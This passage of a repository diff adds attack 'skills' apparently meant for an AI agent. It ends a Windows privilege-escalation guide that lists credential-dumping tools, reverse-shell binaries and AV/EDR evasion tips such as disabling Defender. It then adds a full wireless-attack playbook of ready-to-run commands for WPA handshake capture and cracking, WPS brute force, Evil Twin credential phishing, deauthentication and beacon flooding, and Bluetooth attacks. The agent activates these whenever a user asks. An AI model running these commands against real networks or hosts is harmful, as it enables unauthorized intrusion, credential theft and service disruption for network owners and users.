**SharpUp:**
```cmd
SharpUp.exe audit
```
**PrivescCheck:**
```powershell
Import-Module .\PrivescCheck.ps1
Invoke-PrivescCheck
Invoke-PrivescCheck -Extended
```
## Tools to Transfer
**Essential Binaries:**
- winPEAS.exe - Automated enumeration
- nc.exe - Netcat for reverse shells
- accesschk.exe - Check permissions
- PsExec.exe - Execute as different user
- procdump.exe - Dump process memory
- mimikatz.exe - Credential dumping
- Rubeus.exe - Kerberos attacks
- PrintSpoofer.exe - Token impersonation
- GodPotato.exe - Token impersonation (latest)
**PowerShell Modules:**
- PowerUp.ps1 - Privilege escalation checks
- PowerView.ps1 - AD enumeration
- Invoke-Mimikatz.ps1 - Memory credential dumping
- PrivescCheck.ps1 - Detailed enumeration
## Troubleshooting
**Exploit Not Working:**
- Verify Windows version matches exploit requirements
- Check architecture (x86 vs x64)
- Ensure all required patches are missing
- Check for AV/EDR blocking execution
- Try different exploit variant
**Access Denied:**
- Check file/registry permissions with icacls
- Verify user privileges with whoami /priv
- Ensure UAC is not blocking (run as administrator)
- Check if action requires SYSTEM level
**AV/EDR Bypass:**
- Obfuscate payloads and scripts
- Use in-memory execution
- Disable Windows Defender (if admin)
- Use living-off-the-land binaries (LOLBins)
## Reference Links
- HackTricks Windows Privesc: https://github.com/HackTricks-wiki/hacktricks/tree/master/src/windows-hardening
- PEASS-ng (WinPEAS): https://github.com/carlospolop/PEASS-ng
- PowerSploit (PowerUp): https://github.com/PowerShellMafia/PowerSploit
- Windows Exploit Suggester: https://github.com/AonCyberLabs/Windows-Exploit-Suggester
- PayloadsAllTheThings: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
- LOLBAS Project: https://lolbas-project.github.io/
## When to Use This Skill
Activate this skill when the user asks to:
- Escalate privileges on Windows systems
- Enumerate Windows privilege escalation vectors
- Exploit Windows service misconfigurations
- Perform token manipulation attacks
- Bypass UAC
- Dump Windows credentials
- Analyze Windows security misconfigurations
- Help with Windows penetration testing
Always ensure proper authorization before performing privilege escalation on any system.

386
skills/wireless-attacks/SKILL.md Normal file
View File

@@ -0,0 +1,386 @@
---
name: attacking-wireless-networks
description: Attack WiFi networks using WPA/WPA2 cracking, WPS exploitation, Evil Twin attacks, deauthentication, and wireless reconnaissance. Use when pentesting wireless networks or performing WiFi security assessments.
---
# Attacking Wireless Networks
## When to Use
- WiFi penetration testing
- Wireless network security assessment
- WPA/WPA2/WPA3 cracking
- Evil Twin and rogue AP attacks
- Wireless reconnaissance
## Setup and Tools
**Enable Monitor Mode:**
```bash
# Check wireless interface
iwconfig
iw dev
# Enable monitor mode
airmon-ng start wlan0
# Creates wlan0mon
# Or manually
ip link set wlan0 down
iw wlan0 set monitor none
ip link set wlan0 up
# Disable interfering processes
airmon-ng check kill
```
**Essential Tools:**
- aircrack-ng suite
- Wireshark
- Kismet
- Reaver/Bully (WPS)
- Wifite (automated)
- hcxtools/hcxdumptool
- Fluxion (Evil Twin)
## WiFi Reconnaissance
**Network Discovery:**
```bash
# Scan for networks
airodump-ng wlan0mon
# Scan specific channel
airodump-ng -c 6 wlan0mon
# Scan and save to file
airodump-ng -w capture wlan0mon
# Filter by BSSID
airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture wlan0mon
```
**Kismet:**
```bash
# Start Kismet
kismet
# Command line
kismet_server
kismet_client
# View in web UI
http://localhost:2501
```
## WPA/WPA2 Attacks
### Capture Handshake
```bash
# Method 1: Wait for client connection
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon
# Method 2: Deauth clients to force reconnect
# In another terminal
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
# Or target specific client
aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF -c CLIENT:MAC wlan0mon
# Verify handshake captured
aircrack-ng capture-01.cap
# Look for "1 handshake"
```
### Crack Handshake
**Aircrack-ng:**
```bash
# Crack with wordlist
aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:FF capture-01.cap
# With specific ESSID
aircrack-ng -w wordlist.txt -e "NetworkName" capture-01.cap
```
**Hashcat:**
```bash
# Convert to hashcat format
hcxpcapngtool -o hash.hc22000 capture-01.cap
# Crack WPA/WPA2 (mode 22000)
hashcat -m 22000 hash.hc22000 wordlist.txt
# With rules
hashcat -m 22000 hash.hc22000 wordlist.txt -r rules/best64.rule
# Mask attack
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d
```
**John the Ripper:**
```bash
# Convert cap to john format
hccap2john capture-01.cap > hash.john
# Crack
john --wordlist=wordlist.txt hash.john
```
## WPS Attacks
### WPS Brute Force (Reaver)
```bash
# Check WPS status
wash -i wlan0mon
# Reaver attack
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
# With delay (less aggressive)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -d 5
# Pixie Dust attack (if vulnerable)
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -K
```
### Bully (Alternative)
```bash
# Standard attack
bully -b AA:BB:CC:DD:EE:FF -c 6 wlan0mon
# Pixie Dust
bully -b AA:BB:CC:DD:EE:FF -c 6 wlan0mon -d
```
## Evil Twin Attacks
### Fluxion
```bash
# Start Fluxion
./fluxion.sh
# Follow prompts to:
# 1. Select target network
# 2. Capture handshake
# 3. Create fake AP
# 4. Launch captive portal
# 5. Capture credentials
```
### Manual Evil Twin
```bash
# Create rogue AP
hostapd rogue_ap.conf
# Sample hostapd.conf:
interface=wlan0mon
driver=nl80211
ssid=FreeWiFi
channel=6
hw_mode=g
# DHCP server
dnsmasq -C dnsmasq.conf
# Sample dnsmasq.conf:
interface=wlan0mon
dhcp-range=10.0.0.10,10.0.0.100,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
server=8.8.8.8
# Captive portal (fake login page)
# Setup web server with phishing page
```
## WPA3 Attacks
### Dragonblood
```bash
# Dragonblood toolkit
# Tests WPA3 vulnerabilities (CVE-2019-13377, CVE-2019-13456)
# Dictionary attack (downgrade to WPA2)
# If SAE (WPA3) and WPA2 transition mode enabled
```
### Brute Force SAE
```bash
# hashcat WPA3 (experimental)
hashcat -m 22000 hash.hc22000 wordlist.txt
```
## Denial of Service
### Deauthentication Attack
```bash
# Deauth all clients
aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon
# Deauth specific client
aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF -c CLIENT:MAC wlan0mon
# MDK3 (more aggressive)
mdk3 wlan0mon d -c 6
```
### Beacon Flooding
```bash
# MDK3 beacon flood
mdk3 wlan0mon b -f fake_aps.txt
# Create many fake APs
mdk3 wlan0mon b -n "FakeAP" -m -s 1000
```
## Automated Tools
### Wifite
```bash
# Automated WiFi cracking
wifite
# Target WPA only
wifite --wpa
# Target WPS only
wifite --wps
# Specific BSSID
wifite -b AA:BB:CC:DD:EE:FF
# With custom wordlist
wifite --dict wordlist.txt
```
### WiFi-Pumpkin (Rogue AP Framework)
```bash
# Launch WiFi-Pumpkin
wifi-pumpkin
# Features:
# - Rogue AP creation
# - MITM attacks
# - DNS spoofing
# - Captive portal
# - Traffic sniffing
```
## Enterprise WiFi (WPA-Enterprise)
### EAP-TLS/PEAP Attacks
```bash
# Capture EAP handshake
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w eap_capture wlan0mon
# Extract RADIUS traffic
tshark -r eap_capture-01.cap -Y "eap"
# Rogue RADIUS server
# hostapd-wpe (Wireless Pwnage Edition)
hostapd-wpe wpe.conf
# Crack captured hashes
asleap -r capture.dump -w wordlist.txt
```
## Packet Injection Testing
```bash
# Test injection capability
aireplay-ng --test wlan0mon
# Fake authentication
aireplay-ng --fakeauth 0 -a AA:BB:CC:DD:EE:FF -h YOUR:MAC wlan0mon
# ARP replay attack
aireplay-ng --arpreplay -b AA:BB:CC:DD:EE:FF -h YOUR:MAC wlan0mon
```
## Hidden SSID Discovery
```bash
# Passive monitoring
airodump-ng wlan0mon
# Wait for client probe requests
# Active probing
mdk3 wlan0mon p -t AA:BB:CC:DD:EE:FF
# Deauth and capture beacon
aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF wlan0mon
```
## Bluetooth Attacks
### Discovery
```bash
# Scan for devices
hcitool scan
# Detailed info
hcitool info AA:BB:CC:DD:EE:FF
# Service discovery
sdptool browse AA:BB:CC:DD:EE:FF
```
### BluetoothHunting
```bash
# Bluesnarfing (file access)
bluesnarfer -b AA:BB:CC:DD:EE:FF
# Bluejacking (send messages)
echo "Message" | bluejack AA:BB:CC:DD:EE:FF
# PIN brute force
crackle -i hci0 -o pin.txt
```
## Quick WiFi Pentest Workflow
1. **Monitor Mode** - Enable monitor mode on wireless adapter
2. **Reconnaissance** - Scan for networks (airodump-ng/kismet)
3. **Target Selection** - Choose network (WPS-enabled for easy win)
4. **Handshake Capture** - Deauth clients and capture 4-way handshake
5. **Cracking** - Crack with hashcat/aircrack-ng
6. **Post-Exploitation** - Connect and perform MITM/sniffing
## Common Wins
- **WPS-enabled routers** - Often crackable in minutes with Reaver
- **Weak passwords** - Common WiFi passwords in rockyou.txt
- **WPA2 Transition Mode** - Allows downgrade attacks
- **Open guest networks** - No authentication required
- **Misconfigured Enterprise** - Weak RADIUS authentication
## Defense Detection
- Wireless IDS (WIDS) may detect:
- Deauthentication attacks
- Rogue access points
- Evil Twin attacks
- WPS brute force attempts
- Be aware of monitoring and physical security
## References
- https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-wifi
- https://www.aircrack-ng.org/
- https://github.com/wifiphisher/wifiphisher
- https://www.kali.org/tools/